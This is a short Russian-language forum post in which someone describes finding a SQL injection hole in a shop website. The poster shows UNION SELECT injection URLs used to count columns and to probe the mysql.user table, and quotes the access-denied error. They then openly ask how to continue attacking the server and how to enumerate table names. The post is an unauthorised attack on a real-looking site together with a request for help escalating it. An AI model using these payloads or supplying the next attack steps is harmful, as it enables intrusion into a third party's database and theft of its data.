Я нашел сайт, подверженный SQL инъекции(MySQL). Подсчитал количество полей, которое выдает скрипт. Получилось:
http://www.somesite.ru/shop/?nd=99999 UNION SELECT null,null,null,null,null,null/*

Я решил для испытать права пользователя под которым подключается скрипт к БД, выстроив запрос к базе mysql:

http://www.somesite.ru/shop/?nd=99999 UNION SELECT null,null,null,null,null,null FROM mysql.user/*

На это сайт ответил:

1044Access denied for user: 'wmex@localhost' to database 'mysql'

То беж у меня нет прав.
Что мне делать в этом случае для продолжение атаки на сервер?
Как я понял, в таком случае надо перебирать названия таблиц, но как? и к чему это приведет?

Пожалуйста, посоветуйте, что делать в данном случае?